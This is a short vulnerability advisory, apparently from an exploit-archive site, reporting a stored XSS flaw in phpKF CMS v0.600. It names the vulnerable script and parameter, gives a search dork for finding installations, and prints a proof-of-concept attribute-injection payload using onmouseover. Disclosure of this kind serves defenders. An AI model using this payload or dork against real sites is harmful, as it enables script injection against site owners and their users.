facebook facebook twitter rss

phpKF CMS v0.600 Xss Vulnerability

Author: indoushka , Published: 25-10-2014
phpKF CMS v0.600 Xss Vulnerability
==================================
Author : indoushka
Vondor : http://www.phpkf.com
Dork : Yazılım: phpKF-CMS © 2007-2014
======================================
This vulnerability affects /phpkf/phpkf-bilesenler/iletisim_yap.php.
Discovered by: Scripting (2-Stored_XSS.script).
Attack details
URL encoded POST input posta was set to 1" onmouseover=prompt(936306) bad="
The input is reflected in http://127.0.0.1/phpkf/uye-kayit.php
The input is reflected inside a tag parameter between double quotes.

Like us on Facebook :